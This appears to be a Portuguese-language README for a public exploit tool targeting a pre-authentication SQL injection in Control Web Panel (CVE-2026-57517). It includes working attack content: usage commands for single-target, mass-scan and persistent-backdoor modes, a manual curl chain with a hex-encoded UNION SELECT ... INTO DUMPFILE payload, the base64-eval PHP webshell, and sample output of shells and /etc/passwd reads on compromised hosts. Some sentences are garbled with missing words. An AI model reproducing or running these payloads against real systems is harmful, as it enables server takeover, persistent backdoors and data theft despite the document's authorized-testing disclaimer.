
💉 Injeção SQL cega → exploit de RCE para Control Web Panel (CWP) ≤ 0.9.8.1224 — userRes POST → INTO DUMPFILE → cwpsvc shell
CVE-2026-57517 é uma injeção SQL cega crítica sem autenticação no versões ≤ 0.9.8.1224. O parâmetro POST no endpoint do painel do usuário não é sanitizado antes de ser inserido em uma consulta SQL. As consultas são executadas com privilégios de — que possui o privilégio global — permitindo que atacantes escrevam arquivos arbitrários via .
userResFILEINTO DUMPFILEA cadeia de exploração típica implanta um webshell PHP no diretório de logs do Roundcube acessível pela web, alcançando execução remota de código como a conta de serviço cwpsvc.
| Campo | Detalhe |
|---|---|
| CVE | CVE-2026-57517 |
| CVSS | 9.8 (Critical) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Tipo | CWE-89 — Injeção SQL Cega (Pré-Autenticação) |
| Afetado | Control Web Panel ≤ 0.9.8.1224 |
| Corrigido | Versão 0.9.8.1225 |
| Divulgação | 1 de julho de 2026 |
| Pesquisador | Egidio Romano (Karma In Security) |
| PoC | Público — KIS-2026-12 |
git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt
# Alvo único (detecta usuário automaticamente)
python cve_2026_57517.py -t 192.168.1.100
# Alvo único com nome de usuário conhecido
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc
# Varredura em massa
python cve_2026_57517.py -f targets.txt -o live.txt
# Shell interativo
python cve_2026_57517.py -t target.com --rce -u cwpsvc
# Backdoor persistente (sem limpeza automática)
python cve_2026_57517.py -t target.com --no-cleanup
-t, --target Host alvo único
-f, --file Arquivo com alvos (um por linha)
-u, --username Nome de usuário CWP (ignora detecção automática)
-o, --output Arquivo TXT de saída de alvos ativos
--json Arquivo de relatório JSON
--threads Trabalhadores concorrentes (padrão: 20)
--timeout Segundos de timeout da requisição (padrão: 15)
--no-cleanup Deixar shells no alvo
--rce Modo shell interativo
-v, --verbose Saída detalhada
$ python cve_2026_57517.py -f targets.txt -o live.txt -v
────────────────────────────────────────────────────────────
CVE-2026-57517 | 5 alvos | 20 threads
Limpeza: sim
TXT ativos: live.txt
────────────────────────────────────────────────────────────
✅ 192.168.10.100:2083 [rce_confirmed] 18.2s
Usuário : admin
Shell : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
RCE : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
cwp-prod-01.example.com
whoami: cwpsvc
⚠️ 192.168.10.200:2083 [sqli_failed] 12.1s
Usuário : cwpsvc
Erro : Injeção SQL falhou — alvo pode estar corrigido ou caminho não gravável
· 192.168.10.50:2083 [não_é_cwp] 2.3s
==================================================
RESUMO DA VARREDURA
==================================================
Total : 5
✅ RCE : 2
⚠️ Falha SQLi : 1
🔍 Sem Usuário : 1
· Não é CWP : 1
==================================================
$ python cve_2026_57517.py -t target.com --rce -u admin
CWP Shell Interativo — target.com
Digite 'exit' para sair, 'cleanup' para remover o shell
cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
cwp$ hostname
cwp-prod-01
cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash
cwp$ exit
Passo 1 — Verificar se o CWP está acessível na porta 2083
curl -sk 'https://target.com:2083/' | grep -i 'control web panel\|CWP'
Passo 2 — Validar nome de usuário
curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = usuário existe
Passo 3 — Injeção SQL via userRes
A carga usa um UNION SELECT de 13 colunas com um shell PHP codificado em hex escrito via INTO DUMPFILE:
" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
# A ferramenta lida com a codificação hex automaticamente. Equivalente manual:
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'
curl -sk 'https://target.com:2083/admin/' \
-d "userRes=$PAYLOAD"
Passo 4 — Executar comandos via webshell (porta 2031)
O shell PHP implantado lê comandos do cabeçalho HTTP C::
<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
# Codificar em Base64: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
PHP=$(echo "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)
curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# uid=1001(cwpsvc) gid=1001(cwpsvc)
| Componente | Valor |
|---|---|
| Colunas SQL | UNION SELECT de 13 colunas |
| Shell PHP | <?php eval(base64_decode($_SERVER['HTTP_C'])); ?> |
| Codificação Hex | Literal hex MySQL 0x... |
| Método de escrita | INTO DUMPFILE (escrita binária exata de arquivo) |
| Caminho alvo | /usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php |
| Entrega de comando | Cabeçalho HTTP C: com PHP codificado em base64 |
| Executor de comando | passthru(base64_decode('{cmd}')) |
🚨 APENAS PARA FINS EDUCACIONAIS E TESTES AUTORIZADOS
Este software é fornecido exclusivamente para fins educacionais e pesquisa de segurança legítima. Destina-se a ser utilizado por:
- 🛡️ Profissionais de segurança realizando testes de penetração autorizados
- 🏢 Organizações auditando sua própria infraestrutura CWP
- 🔬 Pesquisadores estudando técnicas de exploração de vulnerabilidades
- 🎓 Estudantes aprendendo sobre segurança de aplicações web
❌ Você NÃO pode usar este software para:
- Acessar sistemas de computador sem autorização explícita por escrito
- Comprometer, danificar ou interromper sistemas que você não possui
- Envolver-se em atividades ilegais de qualquer tipo
⚖️ Aviso Legal
O acesso não autorizado a sistemas de computador viola leis incluindo, mas não se limitando a:
- Estados Unidos: Computer Fraud and Abuse Act (18 U.S.C. § 1030)
- Indonésia: UU ITE Pasal 30 & 46 (UU No. 11 Tahun 2008 jo. UU No. 1 Tahun 2024)
- União Europeia: Diretiva 2013/40/EU
- Reino Unido: Computer Misuse Act 1990
O(s) autor(es) não assumem NENHUMA RESPONSABILIDADE por qualquer uso indevido, dano ou consequências legais resultantes do uso desta ferramenta. Ao usar este software, você reconhece que é o único responsável por suas ações e concorda em cumprir todas as leis aplicáveis.
| Recurso | Link |
|---|---|
| Karma In Security Advisory | KIS-2026-12 |
| PoC Original | CVE-2026-57517.php |
| Divulgação Completa | SecLists |
| OpenCVE | CVE-2026-57517 |
| Changelog do CWP | control-webpanel.com |
⚡ Construído para pesquisa e educação em segurança ⚡
Este projeto não é afiliado ao Control Web Panel ou à Apache Software Foundation.